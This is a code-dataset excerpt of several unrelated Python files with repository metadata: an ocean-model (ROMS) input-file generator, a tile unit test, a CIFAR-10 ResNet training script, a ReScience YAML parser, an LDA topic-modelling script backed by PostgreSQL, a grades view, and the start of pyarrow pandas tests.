dtsec = 40 # was 40 2018/08/11
elif Ldir['blow_ups'] == 1:
dtsec = 30
elif Ldir['blow_ups'] == 2:
dtsec = 25
elif Ldir['blow_ups'] == 3:
dtsec = 20
elif Ldir['blow_ups'] == 4:
dtsec = 15
elif Ldir['blow_ups'] == 5:
dtsec = 10
else:
print('Unsupported number of blow ups: %d' % (Ldir['blow_ups']))
ndtfast = 20
restart_nrrec = '-1' # '-1' for a non-crash restart file, otherwise '1' or '2'
his_interval = 3600 # seconds to define and write to history files
rst_interval = 10 # days between writing to the restart file (e.g. 5)
# which forcings to look for
atm_dir = 'atm1/' # which atm forcing files to use
ocn_dir = 'ocn4/' # which ocn forcing files to use
riv_dir = 'riv2/' # which riv forcing files to use
tide_dir = 'tide2/' # which tide forcing files to use
#### END USER DEFINED VALUES ####
# DERIVED VALUES
if multi_core:
if Ldir['np_num'] == 64: # for new mox nodes 2*32=64 2019_02
ntilei = '8' # number of tiles in I-direction
ntilej = '8' # number of tiles in J-direction
elif Ldir['np_num'] == 72:
ntilei = '6' # number of tiles in I-direction
ntilej = '12' # number of tiles in J-direction
elif Ldir['np_num'] == 112:
ntilei = '8' # number of tiles in I-direction
ntilej = '14' # number of tiles in J-direction
elif Ldir['np_num'] == 144:
ntilei = '8' # number of tiles in I-direction
ntilej = '18' # number of tiles in J-direction
elif Ldir['np_num'] == 196:
ntilei = '14' # number of tiles in I-direction
ntilej = '14' # number of tiles in J-direction
elif Ldir['np_num'] == 392:
ntilei = '14' # number of tiles in I-direction
ntilej = '28' # number of tiles in J-direction
elif Ldir['np_num'] == 588:
ntilei = '21' # number of tiles in I-direction
ntilej = '28' # number of tiles in J-direction
else:
print('Unsupported number of processors: %d' % (Ldir['np_num']))
else:
ntilei = '1'
ntilej = '1'
# if np.mod(3600,dtsec) != 0:
# print('** WARNING: dtsec does not fit evenly into 1 hour **')
if dtsec == int(dtsec):
dt = str(dtsec) + '.0d0' # a string version of dtsec, for the .in file
else:
dt = str(dtsec) + 'd0' # a string version of dtsec, for the .in file
ninfo = int(his_interval/dtsec) # how often to write info to the log file (# of time steps)
nhis = int(his_interval/dtsec) # how often to write to the history files
ndefhis = int(nhis) # how often to create new history files
nrst = int(rst_interval*86400/dtsec)
ntimes = int(days_to_run*86400/dtsec)
# file location stuff
date_string = Ldir['date_string']
date_string_yesterday = fdt_yesterday.strftime('%Y.%m.%d')
dstart = str(int(Lfun.datetime_to_modtime(fdt) / 86400.))
f_string = 'f' + date_string
f_string_yesterday = 'f'+ date_string_yesterday
# where forcing files live (fjord, as seen from gaggle)
# NOTE: eventually this should not be hard-wired.
lo_dir = Ldir['parent'] + 'LiveOcean/'
loo_dir = Ldir['parent'] + 'LiveOcean_output/'
grid_dir = Ldir['parent'] + 'LiveOcean_data/grids/' + Ldir['gridname'] + '/'
force_dir = loo_dir + gtag + '/' + f_string + '/'
roms_dir = Ldir['parent'] + 'LiveOcean_roms/'
# determine grid size
# gfn = grid_dir + 'grid.nc'
# ds = nc.Dataset(gfn)
# h = ds['h'][:]
# nrows0, ncols0 = h.shape
# nrows = nrows0 - 2
# ncols = ncols0 - 2
#ds.close()
# hardwired because we don't have netCDF4
nrows = 1302 - 2
ncols = 663 - 2
# determine number of layers
s_dict = Lfun.csv_to_dict(grid_dir + 'S_COORDINATE_INFO.csv')
nlayers = str(s_dict['N'])
if do_bio:
bio_tag = ''
else:
bio_tag = ''
# the .in file
dot_in_name = 'liveocean.in' # name of the .in file
dot_in_dir00 = Ldir['roms'] + 'output/'
Lfun.make_dir(dot_in_dir00) # make sure it exists
dot_in_dir0 = Ldir['roms'] + 'output/' + gtagex + '/'
Lfun.make_dir(dot_in_dir0) # make sure it exists
dot_in_dir = dot_in_dir0 + f_string +'/'
Lfun.make_dir(dot_in_dir, clean=True) # make sure it exists and is empty
# where to put the output files according to the .in file
out_dir0 = roms_dir + 'output/' + gtagex + '/'
out_dir = out_dir0 + f_string + '/'
if Ldir['start_type'] == 'continuation':
nrrec = '0' # '-1' for a hot restart
#ininame = 'ocean_rst.nc' # for a hot perfect restart
ininame = 'ocean_his_0025.nc' # for a hot restart
ini_fullname = out_dir0 + f_string_yesterday + '/' + ininame
elif Ldir['start_type'] == 'new':
nrrec = '0' # '0' for a history or ini file
ininame = 'ocean_ini' + bio_tag + '.nc' # could be an ini or history file
ini_fullname = force_dir + ocn_dir + ininame
# END DERIVED VALUES
## create .in ##########################
f = open('BLANK.in','r')
f2 = open(dot_in_dir + dot_in_name,'w')
in_varlist = ['base_dir','ntilei','ntilej','ntimes','dt','nrrec','ninfo',
'nhis','dstart','ndefhis','nrst','force_dir','grid_dir','roms_dir',
'atm_dir','ocn_dir','riv_dir','tide_dir','dot_in_dir',
'ini_fullname','out_dir','EX_NAME','roms_name','bio_tag',
'nrows','ncols', 'nlayers', 'ndtfast']
for line in f:
for var in in_varlist:
if '$'+var+'$' in line:
line2 = line.replace('$'+var+'$', str(eval(var)))
line = line2
else:
line2 = line
f2.write(line2)
f.close()
f2.close()
## npzd2o_Banas.in ###########
f = open('npzd2o_Banas_BLANK.in','r')
bio_dot_in_name = 'npzd2o_Banas.in'
f3 = open(dot_in_dir + bio_dot_in_name,'w')
in_varlist = ['force_dir','riv_dir','bio_tag']
for line in f:
for var in in_varlist:
if '$'+var+'$' in line:
line2 = line.replace('$'+var+'$', str(eval(var)))
line = line2
else:
line2 = line
f3.write(line2)
f.close()
f3.close()
| 32.159624
| 91
| 0.644088
|
4a07c1195a6f004b79e20eb89b6ddb058d73cf4b
| 370
|
py
|
Python
|
libunittest/test_tile.py
|
Shathra/puzzlib
|
98c63e69cb6c3de0aa3167a8834c224f7f25f6a7
|
[
"BSD-2-Clause"
] | 1
|
2016-06-19T04:25:35.000Z
|
2016-06-19T04:25:35.000Z
|
libunittest/test_tile.py
|
Shathra/puzzlib
|
98c63e69cb6c3de0aa3167a8834c224f7f25f6a7
|
[
"BSD-2-Clause"
] | null | null | null |
libunittest/test_tile.py
|
Shathra/puzzlib
|
98c63e69cb6c3de0aa3167a8834c224f7f25f6a7
|
[
"BSD-2-Clause"
] | null | null | null |
import unittest
from puzz import *
class TestTile( unittest.TestCase):
def test_const(self):
t = Tile()
self.assertEqual( t.get_value(), Tile.DEFAULT_VALUE)
t = Tile(5)
self.assertEqual( t.get_value(), 5)
def test_set_get( self):
t = Tile()
t.set_value( 3)
self.assertEqual( t.get_value(), 3)
t.set_value( 4)
self.assertEqual( t.get_value(), 4)
| 18.5
| 54
| 0.678378
|
4a07c16e567ad2f4cf041a00a0a2539edb2409ea
| 3,978
|
py
|
Python
|
supervised_cifar10.py
|
luyuzhe111/simsiam
|
ced608e8e9ff51f431f52d7da10d25e68b516b79
|
[
"MIT"
] | 3
|
2021-05-25T08:35:55.000Z
|
2021-08-02T02:26:06.000Z
|
supervised_cifar10.py
|
luyuzhe111/simsiam
|
ced608e8e9ff51f431f52d7da10d25e68b516b79
|
[
"MIT"
] | null | null | null |
supervised_cifar10.py
|
luyuzhe111/simsiam
|
ced608e8e9ff51f431f52d7da10d25e68b516b79
|
[
"MIT"
] | null | null | null |
import torch
import torch.nn as nn
import torch.optim as optim
import torch.nn.functional as F
import torch.backends.cudnn as cudnn
import torchvision
import torchvision.transforms as transforms
import os
import argparse
from models.backbones.resnet import resnet50
parser = argparse.ArgumentParser(description='PyTorch CIFAR10 Training')
parser.add_argument('--lr', default=0.01, type=float, help='learning rate')
args = parser.parse_args()
device = 'cuda' if torch.cuda.is_available() else 'cpu'
best_acc = 0 # best test accuracy
start_epoch = 0 # start from epoch 0 or last checkpoint epoch
# Data
print('==> Preparing data..')
transform_train = transforms.Compose([
transforms.ToTensor(),
transforms.Normalize((0.4914, 0.4822, 0.4465), (0.2023, 0.1994, 0.2010)),
])
transform_test = transforms.Compose([
transforms.ToTensor(),
transforms.Normalize((0.4914, 0.4822, 0.4465), (0.2023, 0.1994, 0.2010)),
])
trainset = torchvision.datasets.CIFAR10(
root='./data', train=True, download=True, transform=transform_train)
trainloader = torch.utils.data.DataLoader(
trainset, batch_size=64, shuffle=True, num_workers=2)
testset = torchvision.datasets.CIFAR10(
root='./data', train=False, download=True, transform=transform_test)
testloader = torch.utils.data.DataLoader(
testset, batch_size=64, shuffle=False, num_workers=2)
classes = ('plane', 'car', 'bird', 'cat', 'deer',
'dog', 'frog', 'horse', 'ship', 'truck')
# Model
print('==> Building model..')
net = resnet50()
net.head = net.head[:3]
net.fc = nn.Linear(2048, 10)
net = net.to(device)
if device == 'cuda':
net = torch.nn.DataParallel(net)
cudnn.benchmark = True
criterion = nn.CrossEntropyLoss()
optimizer = optim.SGD(net.parameters(), lr=args.lr,
momentum=0.9, weight_decay=5e-4)
scheduler = torch.optim.lr_scheduler.CosineAnnealingLR(optimizer, T_max=200)
# Training
def train(epoch):
print('\nEpoch: %d' % epoch)
net.train()
train_loss = 0
correct = 0
total = 0
for batch_idx, (inputs, targets) in enumerate(trainloader):
upsampler = nn.Upsample(scale_factor=7)
inputs = upsampler(inputs)
inputs, targets = inputs.to(device), targets.to(device)
optimizer.zero_grad()
outputs = net(inputs)
loss = criterion(outputs, targets)
loss.backward()
optimizer.step()
train_loss += loss.item()
_, predicted = outputs.max(1)
total += targets.size(0)
correct += predicted.eq(targets).sum().item()
print(batch_idx, len(trainloader), 'Loss: %.3f | Acc: %.3f%% (%d/%d)'
% (train_loss/(batch_idx+1), 100.*correct/total, correct, total))
def test(epoch):
global best_acc
net.eval()
test_loss = 0
correct = 0
total = 0
with torch.no_grad():
for batch_idx, (inputs, targets) in enumerate(testloader):
inputs, targets = inputs.to(device), targets.to(device)
upsampler = nn.Upsample(scale_factor=7)
inputs = upsampler(inputs)
outputs = net(inputs)
loss = criterion(outputs, targets)
test_loss += loss.item()
_, predicted = outputs.max(1)
total += targets.size(0)
correct += predicted.eq(targets).sum().item()
print(batch_idx, len(testloader), 'Loss: %.3f | Acc: %.3f%% (%d/%d)'
% (test_loss/(batch_idx+1), 100.*correct/total, correct, total))
# Save checkpoint.
acc = 100.*correct/total
if acc > best_acc:
print('Saving..')
state = {
'net': net.state_dict(),
'acc': acc,
'epoch': epoch,
}
if not os.path.isdir('checkpoint'):
os.mkdir('checkpoint')
torch.save(state, './checkpoint/ckpt.pth')
best_acc = acc
for epoch in range(start_epoch, start_epoch+200):
train(epoch)
test(epoch)
scheduler.step()
| 30.366412
| 89
| 0.632227
|
4a07c2c03c68b56f0a4584f9d3842daa680dfd09
| 10,069
|
py
|
Python
|
report/article.py
|
RaphaelaHeil/Variational-Sparse-Coding
|
8c90d91d1e8f0d2c2534b02c580365d2e96cc812
|
[
"MIT"
] | 48
|
2018-11-01T22:04:27.000Z
|
2021-12-08T12:16:03.000Z
|
report/article.py
|
RaphaelaHeil/Variational-Sparse-Coding
|
8c90d91d1e8f0d2c2534b02c580365d2e96cc812
|
[
"MIT"
] | 3
|
2019-12-05T04:27:27.000Z
|
2020-05-22T02:46:55.000Z
|
report/article.py
|
RaphaelaHeil/Variational-Sparse-Coding
|
8c90d91d1e8f0d2c2534b02c580365d2e96cc812
|
[
"MIT"
] | 5
|
2019-01-07T19:16:12.000Z
|
2021-06-02T14:52:12.000Z
|
# ReScience yaml parser
# Released under the BSD two-clauses licence
import yaml
class Contributor:
def __init__(self, role, name, orcid="", email="", affiliations=[]):
self.role = role
self.name = name
self.fullname = name
self.lastname = self.get_lastname(name)
self.abbrvname = self.get_abbrvname(name)
self.orcid = orcid
self.email = email
self.affiliations = affiliations
def get_abbrvname(self, name):
if not name: return ""
if ',' in name:
lastname = name.split(",")[0]
firstnames = name.split(",")[1].strip().split(" ")
else:
lastname = name.split(" ")[-1]
firstnames = name.split(" ")[:-1]
abbrvname = ""
for firstname in firstnames:
if "-" in firstname:
for name in firstname.split("-"):
abbrvname += name[0].strip().upper() + '.-'
abbrvname = abbrvname[:-1]
else:
abbrvname += firstname[0].strip().upper() + '.'
return abbrvname + " " + lastname
def get_lastname(self, name):
if not name: return ""
# Rougier, Nicolas P.
if ',' in name:
lastname = name.split(",")[0].strip()
firstname = name.split(",")[1].strip()
# Nicolas P. Rougier
else:
lastname = name.split(" ")[-1]
firstname = name.split(" ")[:-1]
return lastname
class Affiliation:
def __init__(self, code, name, address=""):
self.code = code
self.name = name
self.address = address
class Repository:
def __init__(self, name, url, doi):
self.name = name
self.url = url
self.doi = doi
class Replication:
def __init__(self, cite, bib, url, doi):
self.cite = cite
self.bib = bib
self.url = url
self.doi = doi
class Review:
def __init__(self, url, doi):
self.url = url
self.doi = doi
class Date:
def __init__(self, date):
try:
import dateutil.parser
date = dateutil.parser.parse(date)
self.date = date
self.year = date.year
self.month = date.month
self.day = date.day
self.textual = self.date.strftime("%d %B %Y")
except:
import datetime
now = datetime.datetime.now()
self.date = now
self.year = now.year
self.month = now.month
self.day = now.day
self.textual = ""
def __str__(self):
return self.textual
#return self.date.strftime("%d %B %Y")
def __repr__(self):
return self.textual
# return self.date.strftime("%d %B %Y")
class Article:
def __init__(self, data):
self.title = ""
self.absract = ""
self.type = ""
self.domain = ""
self.language = ""
self.bibliography = ""
self.keywords = []
self.authors = []
self.editors = []
self.reviewers = []
self.affiliations = []
self.code = ""
self.data = ""
self.contact = ""
self.review = ""
self.replication = ""
self.date_received = ""
self.date_accepted = ""
self.date_published = ""
self.journal_name = ""
self.journal_issn = ""
self.journal_volume = ""
self.journal_issue = ""
self.article_number = ""
self.article_doi = ""
self.article_url = ""
self.parse(data)
# Build authors list
self.authors_short = "" # Family names only
self.authors_abbrv = "" # Abbreviated firsnames + Family names
self.authors_full = "" # Full names
n = len(self.authors)
if n > 3:
self.authors_short = self.authors[0].lastname + " et al."
self.authors_abbrv = self.authors[0].abbrvname + " et al."
self.authors_full = self.authors[0].fullname + " et al."
elif n==1:
self.authors_short += self.authors[0].lastname
self.authors_abbrv += self.authors[0].abbrvname
self.authors_full += self.authors[0].fullname
else:
for i in range(n-2):
self.authors_short += self.authors[i].lastname + ", "
self.authors_abbrv += self.authors[i].abbrvname + ", "
self.authors_full += self.authors[i].fullname + ", "
if n >= 2:
self.authors_short += self.authors[n-2].lastname + " and "
self.authors_short += self.authors[n-1].lastname
self.authors_abbrv += self.authors[n-2].abbrvname + " and "
self.authors_abbrv += self.authors[n-1].abbrvname
self.authors_full += self.authors[n-2].fullname + " and "
self.authors_full += self.authors[n-1].fullname
def parse(self, data):
document = yaml.load(data)
self.title = document.get("title", "")
self.abstract = document.get("abstract","") or ""
self.keywords = document["keywords"] or ""
self.type = document["type"] or ""
self.domain = document["domain"] or ""
self.language = document["language"] or ""
self.bibliography = document["bibliography"] or ""
# Miscellaneous dates
dates = {key:value for data in document["dates"]
for key, value in data.items()}
self.date_received = Date(dates["received"] or "")
self.date_accepted = Date(dates["accepted"] or "")
self.date_published = Date(dates["published"] or "")
# Add authors
for item in document["authors"]:
role = "author"
name = item["name"] or ""
orcid = item.get("orcid","") or ""
email = item.get("email","") or ""
if item["affiliations"] is not None:
affiliations = item["affiliations"].split(",")
if "*" in affiliations:
affiliations.remove("*")
author = Contributor(role, name, orcid, email, affiliations)
self.add_contributor(author)
self.contact = author
else:
author = Contributor(role, name, orcid, email, affiliations)
self.add_contributor(author)
# Add author affiliations
for item in document["affiliations"]:
self.affiliations.append(
Affiliation(item["code"],
item["name"],
item.get("address", "")))
# Add editor & reviewers
for item in document["contributors"]:
role = item["role"]
name = item["name"] or ""
orcid = item.get("orcid","") or ""
contributor = Contributor(role, name, orcid)
self.add_contributor(contributor)
# Code repository (mandatory)
if "code" in document.keys():
code = {key:value for data in document["code"]
for key, value in data.items()}
self.code = Repository("code",
code.get("url","") or "",
code.get("doi","") or "")
else:
raise IndexError("Code repository not found")
# Data repository (optional)
if "data" in document.keys():
data = {key:value for data in document["data"]
for key, value in data.items()}
self.data = Repository("data",
data.get("url","") or "",
data.get("doi","") or "")
else:
self.data = Repository("data", "", "")
# Review
review = {key:value for review in document["review"]
for key, value in review.items()}
self.review = Review(review.get("url","") or "",
review.get("doi","") or "")
# Replication
replication = {key:value for replication in document["replication"]
for key, value in replication.items()}
self.replication = Replication(replication["cite"] or "",
replication["bib"] or "",
replication["url"] or "",
replication["doi"] or "")
# Article number & DOI
article = {key:value for article in document["article"]
for key, value in article.items()}
self.article_number = article["number"] or ""
self.article_doi = article["doi"] or ""
self.article_url = article["url"] or ""
# Journal volume and issue
journal = {key:value for journal in document["journal"]
for key, value in journal.items()}
self.journal_name = str(journal.get("name",""))
self.journal_issn = str(journal.get("issn", ""))
self.journal_volume = journal["volume"] or ""
self.journal_issue = journal["issue"] or ""
def add_contributor(self, contributor):
if contributor.role == "author":
self.authors.append(contributor)
elif contributor.role == "editor":
self.editors.append(contributor)
elif contributor.role == "reviewer":
self.reviewers.append(contributor)
else:
raise(IndexError)
# -----------------------------------------------------------------------------
if __name__ == '__main__':
with open("metadata.yaml") as file:
article = Article(file.read())
print(article.authors_full)
print(article.authors_abbrv)
print(article.authors_short)
| 34.482877
| 80
| 0.500844
|
4a07c42037d9b9b9b66be958efb165302f00935b
| 1,112
|
py
|
Python
|
chhotu/orders/apis.py
|
roshan007/chhout.web.backend
|
a952a53d908fb0c648b8b7279130166c2054f502
|
[
"MIT"
] | null | null | null |
chhotu/orders/apis.py
|
roshan007/chhout.web.backend
|
a952a53d908fb0c648b8b7279130166c2054f502
|
[
"MIT"
] | null | null | null |
chhotu/orders/apis.py
|
roshan007/chhout.web.backend
|
a952a53d908fb0c648b8b7279130166c2054f502
|
[
"MIT"
] | null | null | null |
from rest_framework import generics, response, status
from .models import Cart
from .serializers import CartSerializer
class AddToCart(generics.ListCreateAPIView):
"""
api to support adding products to cart
"""
model = Cart
serializer_class = CartSerializer
def get_queryset(self):
print self.request.META
if self.request.user.is_authenticated():
return self.model.objects.filter(user=self.request.user)
else:
return self.model.objects.filter(pid=self.request.META.get('urcpid', None), uid=self.request.META.get('gpduid'))
def create(self, request, *args, **kwargs):
serializer = self.get_serializer(data=request.data)
serializer.is_valid(raise_exception=True)
self.perform_create(serializer)
return response.Response(serializer.data, status=status.HTTP_201_CREATED)
def perform_create(self, serializer):
serializer.validated_data['pid'] = self.request.META.get('urcpid', None)
serializer.validated_data['uid'] = self.request.META.get('gpduid', None)
serializer.save()
| 34.75
| 124
| 0.698741
|
4a07c4272d7ad81095e001f791aad691676c7796
| 708
|
py
|
Python
|
views/grades.py
|
MatthewKosloski/student-information-system
|
a3469647298d62c45c793e70a3ac70c0524340e2
|
[
"CECILL-B"
] | null | null | null |
views/grades.py
|
MatthewKosloski/student-information-system
|
a3469647298d62c45c793e70a3ac70c0524340e2
|
[
"CECILL-B"
] | null | null | null |
views/grades.py
|
MatthewKosloski/student-information-system
|
a3469647298d62c45c793e70a3ac70c0524340e2
|
[
"CECILL-B"
] | null | null | null |
from .base import BaseView
from table import Table
class GradesView(BaseView):
def __init__(self, controller):
super().__init__(controller)
self.set_choices([
'Back'
])
'''
Creates a table listing the student's
grades for each section.
@param grades {list}
@return Table
'''
def get_grades_table(self, grades):
table = Table(['COURSE', 'GRADE', 'PERCENT'])
for item in grades:
table.add_row([
item['course'],
item['grade'],
item['percent']
])
return table
def render(self, payload):
self.print_title(payload['view_title'])
print(self.get_grades_table(payload['grades']))
print()
print(self.get_choices_list())
print()
self.choice_prompt()
| 17.7
| 49
| 0.672316
|
4a07c63add5abc7ad9451d054d9385cd5e5d4161
| 7,694
|
py
|
Python
|
yanrin/topic_modeling.py
|
jaideep2/yanrin
|
ba34f7f1c9d7f43f4800ea5cc25a333553ce9186
|
[
"Apache-2.0"
] | null | null | null |
yanrin/topic_modeling.py
|
jaideep2/yanrin
|
ba34f7f1c9d7f43f4800ea5cc25a333553ce9186
|
[
"Apache-2.0"
] | null | null | null |
yanrin/topic_modeling.py
|
jaideep2/yanrin
|
ba34f7f1c9d7f43f4800ea5cc25a333553ce9186
|
[
"Apache-2.0"
] | null | null | null |
import gensim
from nltk.corpus import stopwords
from nltk.stem import WordNetLemmatizer
from gensim.corpora import Dictionary
from gensim.models import CoherenceModel, LdaModel, TfidfModel
import operator
import psycopg2
from sql.statements import create_new_record, update_news_id, find_record
from utils.helper import get_datequery
doc2id_mapping = {}
def get_doc(date):
doc = []
try:
conn = psycopg2.connect("dbname=jaideepsingh user=jaideepsingh")
cur = conn.cursor()
cur.execute('''select id,content from news where ''' + get_datequery(date))
rows = cur.fetchall()
for i,row in enumerate(rows):
doc2id_mapping[i] = row[0]
doc.append(row[1])
conn.commit()
cur.close()
conn.close()
except (Exception, psycopg2.DatabaseError) as error:
print(error)
finally:
if conn is not None:
conn.close()
return doc
def build_texts(doc):
for d in doc: yield gensim.utils.simple_preprocess(d, deacc=True, min_len=3)
def process_doc(doc):
train_texts = list(build_texts(doc))
print('train len:', len(train_texts))
bigram = gensim.models.Phrases(train_texts, min_count=10) # for bigram collocation detection
stops = set(stopwords.words('english')) # nltk stopwords list
#Stopword Removal.
texts = [[word for word in line if word not in stops] for line in train_texts]
#Collocation detection.
texts = [bigram[line] for line in texts]
# Remove numbers, but not words that contain numbers.
texts = [[token for token in line if not token.isnumeric()] for line in texts]
# Remove words that are only two or less characters.
texts = [[token for token in line if len(token) > 2] for line in texts]
#Lemmatization (not stem since stemming can reduce the interpretability).
lemmatizer = WordNetLemmatizer()
texts = [[word for word in lemmatizer.lemmatize(' '.join(line), pos='v').split()] for line in texts]
return texts
def ret_top_model(corpus, dictionary, train_texts, num_times):
"""
Since LDAmodel is a probabilistic model, it comes up different topics each time we run it. To control the
quality of the topic model we produce, we can see what the interpretability of the best topic is and keep
evaluating the topic model until a certian threshold is crossed.
Returns:
-------
lm: Final evaluated topic model
top_topics: ranked topics in decreasing order. List of tuples
"""
top_topics = [(0, 0)]
rounds = 1
high = 0.0
out_lm = None
print('dict size:',len(dictionary))
num_topics = int(len(dictionary)*0.1) #10% of all dictionary
print('num_topics:',num_topics)
while True:
lm = LdaModel(corpus=corpus, num_topics=num_topics, id2word=dictionary, minimum_probability=0)
coherence_values = {}
for n, topic in lm.show_topics(num_topics=-1, formatted=False):
topic = [word for word, _ in topic]
cm = CoherenceModel(topics=[topic], texts=train_texts, dictionary=dictionary, window_size=10)
coherence_values[n] = cm.get_coherence()
top_topics = sorted(coherence_values.items(), key=operator.itemgetter(1), reverse=True)
if high < top_topics[0][1]:
high = top_topics[0][1]
out_lm = lm
print('round ',rounds,':',top_topics[0][1])
if rounds > num_times-1:
break
rounds+=1
return out_lm, top_topics, high
def get_doc_topics(doc,lm,dictionary,doc_id):
print('getting topics for doc',doc_id)
topic_distribution = lm.get_document_topics(dictionary.doc2bow(doc[doc_id].split()), minimum_probability=0.6)
topic_distribution = sorted(topic_distribution, key=lambda x: float(x[1]), reverse=True)
topics = []
for t, f in topic_distribution:
print('Prob:',t,f)
for word, prob in lm.show_topic(t):
topics.append(word)
return topics
def create_dates(year):
from datetime import date,timedelta
start = date(year,1,1)
dates = []
while start.year == year and start.month == 1:
start += timedelta(days=1)
dates.append(start)
return dates
def process_dict(train_texts, doc_len):
dictionary = Dictionary(train_texts)
print('dict size:', len(dictionary))
# remove extremes
no_below = int(doc_len * 0.008)
filter_freq = int(doc_len * 0.2)
print('no_below,filter_freq:', no_below, filter_freq)
dictionary.filter_extremes(no_below=no_below) # remove words in less 0.8% of documents
dictionary.filter_n_most_frequent(filter_freq) # Filter out 20% of most common word tokens
# filter_tokens(bad_ids=None, good_ids=None)
return dictionary
def insert_new_row(cur, topic_name, date, news_id):
cur.execute(create_new_record,
{'name': topic_name, 'type': 'All', 'startdate': date, 'enddate': date, 'news_ids': '{%s}' % news_id})
print('new row done')
def update_row(cur, topic_name, date, news_id, row_id):
cur.execute(update_news_id, {'news_ids': '%s' % news_id, 'id' : row_id})
print('rows updated')
def find_relevant_rows(cur, topic_name, date):
cur.execute(find_record, {'name': topic_name, 'date': date})
return cur.fetchall()
def insert_into_relevant_topic(cur, topic_name, news_id, date):
rows = find_relevant_rows(cur, topic_name, date)
print('insert_into_relevant_topic rows:',rows)
if not rows:
# if topic name doesnt exist for current date insert new topic with news_ids = 0 and given date
print('insert_new_row')
insert_new_row(cur, topic_name, date, news_id)
else:
# if topic exists append news_id to said topic
print('update_row')
update_row(cur, topic_name, date, news_id, rows[0][0])
def main():
'''
0. decide what date or range of dates to run this on
1. create dictionary and corpus
2. create model
3. for each doc get top topic
4. insert topic into topic table with date
:return:
'''
datez = create_dates(2016)
doc = []
for date in datez:
doc.extend(get_doc(date))
doc_len = len(doc)
train_texts = process_doc(doc)
dictionary = process_dict(train_texts,doc_len)
corpus = [dictionary.doc2bow(text) for text in train_texts]
print('doc_len:',doc_len)
print('corpus size:',len(corpus))
print('lda+lsi model start!')
num_times = 1
lm, top_topics, high = ret_top_model(corpus,dictionary,train_texts,num_times)
save_model = True
load_model = False
if save_model:
lm.save('/Users/jaideepsingh/Projects/yanrin/lm2016Jan.ldamodel')
if load_model:
lm = LdaModel.load('/Users/jaideepsingh/Projects/yanrin/lm2016Jan.ldamodel')
print('finished!')
try:
conn = psycopg2.connect("dbname=jaideepsingh user=jaideepsingh")
cur = conn.cursor()
for doc_id in range(doc_len):
topics = get_doc_topics(doc, lm, dictionary, doc_id)
print(topics)
print('docid:',doc_id)
print('mapping:',doc2id_mapping[doc_id])
news_id = doc2id_mapping[doc_id]
print('news_id:',news_id)
if topics:
for topic_name in topics:
print('Putting topic',topic_name,'into topics table')
insert_into_relevant_topic(cur, topic_name, news_id, date)
conn.commit()
cur.close()
conn.close()
print('db closed')
except (Exception, psycopg2.DatabaseError) as error:
print(error)
finally:
if conn is not None:
conn.close()
if __name__ == '__main__':
main()
| 37.169082
| 118
| 0.661944
|
4a07c6f5fda6ab717d55307d3d3c68b196c81732
| 123,870
|
py
|
Python
|
python/pyarrow/tests/test_pandas.py
|
jsternberg/arrow
|
a241cf60d1a5d485a95dfe95bbdc5bdcaadfd213
|
[
"Apache-2.0"
] | null | null | null |
python/pyarrow/tests/test_pandas.py
|
jsternberg/arrow
|
a241cf60d1a5d485a95dfe95bbdc5bdcaadfd213
|
[
"Apache-2.0"
] | null | null | null |
python/pyarrow/tests/test_pandas.py
|
jsternberg/arrow
|
a241cf60d1a5d485a95dfe95bbdc5bdcaadfd213
|
[
"Apache-2.0"
] | null | null | null |
# -*- coding: utf-8 -*-
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
import gc
import six
import decimal
import json
import multiprocessing as mp
import sys
from collections import OrderedDict
from datetime import date, datetime, time, timedelta
from distutils.version import LooseVersion
import hypothesis as h
import hypothesis.extra.pytz as tzst
import hypothesis.strategies as st
import numpy as np
import numpy.testing as npt
import pytest
import pytz
from pyarrow.pandas_compat import get_logical_type, _pandas_api
from pyarrow.tests.util import random_ascii
import pyarrow as pa
try:
import pandas as pd
import pandas.util.testing as tm
from .pandas_examples import dataframe_with_arrays, dataframe_with_lists
except ImportError:
pass
# Marks all of the tests in this module
pytestmark = pytest.mark.pandas
def _alltypes_example(size=100):
return pd.DataFrame({
'uint8': np.arange(size, dtype=np.uint8),
'uint16': np.arange(size, dtype=np.uint16),
'uint32': np.arange(size, dtype=np.uint32),
'uint64': np.arange(size, dtype=np.uint64),
'int8': np.arange(size, dtype=np.int16),
'int16': np.arange(size, dtype=np.int16),
'int32': np.arange(size, dtype=np.int32),
'int64': np.arange(size, dtype=np.int64),
'float32': np.arange(size, dtype=np.float32),
'float64': np.arange(size, dtype=np.float64),
'bool': np.random.randn(size) > 0,
# TODO(wesm): Pandas only support ns resolution, Arrow supports s, ms,
# us, ns
'datetime': np.arange("2016-01-01T00:00:00.001", size,
dtype='datetime64[ms]'),
'str': [str(x) for x in range(size)],
'str_with_nulls': [None] + [str(x) for x in range(size - 2)] + [None],
'empty_str': [''] * size
})
def _check_pandas_roundtrip(df, expected=None, use_threads=True,
expected_schema=None,
check_dtype=True, schema=None,
preserve_index=False,
as_batch=False):
klass = pa.RecordBatch if as_batch else pa.Table
table = klass.from_pandas(df, schema=schema,
preserve_index=preserve_index,
nthreads=2 if use_threads else 1)
result = table.to_pandas(use_threads=use_threads)
if expected_schema:
# all occurences of _check_pandas_roundtrip passes expected_schema
# without the pandas generated key-value metadata
assert table.schema.equals(expected_schema, check_metadata=False)
if expected is None:
expected = df
tm.assert_frame_equal(result, expected, check_dtype=check_dtype,
check_index_type=('equiv' if preserve_index
else False))
def _check_series_roundtrip(s, type_=None, expected_pa_type=None):
arr = pa.array(s, from_pandas=True, type=type_)
if type_ is not None and expected_pa_type is None:
expected_pa_type = type_
if expected_pa_type is not None:
assert arr.type == expected_pa_type
result = pd.Series(arr.to_pandas(), name=s.name)
tm.assert_series_equal(s, result)
def _check_array_roundtrip(values, expected=None, mask=None,
type=None):
arr = pa.array(values, from_pandas=True, mask=mask, type=type)
result = arr.to_pandas()
values_nulls = pd.isnull(values)
if mask is None:
assert arr.null_count == values_nulls.sum()
else:
assert arr.null_count == (mask | values_nulls).sum()
if expected is None:
if mask is None:
expected = pd.Series(values)
else:
expected = pd.Series(np.ma.masked_array(values, mask=mask))
tm.assert_series_equal(pd.Series(result), expected, check_names=False)
def _check_array_from_pandas_roundtrip(np_array, type=None):
arr = pa.array(np_array, from_pandas=True, type=type)
result = arr.to_pandas()
